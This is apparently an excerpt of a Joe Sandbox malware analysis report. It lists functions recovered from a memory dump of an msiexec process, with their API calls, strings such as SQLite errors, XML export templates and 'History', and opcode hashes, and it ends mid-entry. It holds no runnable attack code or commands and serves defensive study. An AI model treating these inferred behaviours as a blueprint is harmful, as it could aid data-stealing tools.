                                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                            APIs
                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                            • memset.MSVCRT ref: 00408FD4
                                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                            • memset.MSVCRT ref: 00409042
                                                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 265355444-0
                                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2618321458-3614832568
                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFilefreememset
                                                                                            • String ID:
                                                                                            • API String ID: 2507021081-0
                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                            • free.MSVCRT ref: 00417544
                                                                                            • free.MSVCRT ref: 00417562
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4131324427-0
                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                            • free.MSVCRT ref: 0041822B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$free
                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                            • API String ID: 924794160-1420421710
                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                                            • API String ID: 1775345501-2769808009
                                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                            • String ID: Error$Error %d: %s
                                                                                            • API String ID: 313946961-1552265934
                                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                                            • API String ID: 0-1953309616
                                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                            APIs
                                                                                            Strings
                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                            • API String ID: 3510742995-272990098
                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1265369119-0
                                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: gj
                                                                                            • API String ID: 1297977491-4203073231
                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                            • free.MSVCRT ref: 0040E9D3
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$free
                                                                                            • String ID:
                                                                                            • API String ID: 2241099983-0
                                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                            • free.MSVCRT ref: 004174E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4053608372-0
                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1471605966-0
                                                                                            • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                            • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                            • String ID: \StringFileInfo\
                                                                                            • API String ID: 102104167-2245444037
                                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memicmpwcslen
                                                                                            • String ID: @@@@$History
                                                                                            • API String ID: 1872909662-685208920
                                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                            • memset.MSVCRT ref: 00410112
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                            • String ID: </%s>
                                                                                            • API String ID: 3400436232-259020660
                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                            • String ID: caption
                                                                                            • API String ID: 1523050162-4135340389
                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                            APIs
                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                            Strings
